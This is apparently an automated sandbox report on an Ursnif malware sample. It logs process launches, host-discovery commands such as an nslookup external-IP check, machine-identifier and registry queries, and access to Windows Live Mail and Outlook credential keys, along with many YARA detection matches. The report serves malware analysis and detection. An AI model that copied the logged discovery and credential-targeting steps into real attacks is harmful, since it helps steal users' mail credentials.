                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
                      Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: explorer.exe, 0000001C.00000000.922381772.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
                      Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.901511392.0000000001080000.00000002.00020000.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmp | Binary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.884577351.0000000005E50000.00000004.00000001.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.901511392.0000000001080000.00000002.00020000.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmp | Binary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.901511392.0000000001080000.00000002.00020000.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
                      Source: explorer.exe, 0000001C.00000000.889230048.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
                      Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,
                      Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00DD2E33 cpuid
                      Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4B109B GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00DD2E33 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0457D8BC CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4B1C6F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

                      Stealing of Sensitive Information:

                      Yara detected Ursnif
                      Source: Yara match | File source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
                      Source: Yara match | File source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif
                      Source: Yara matchFile source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
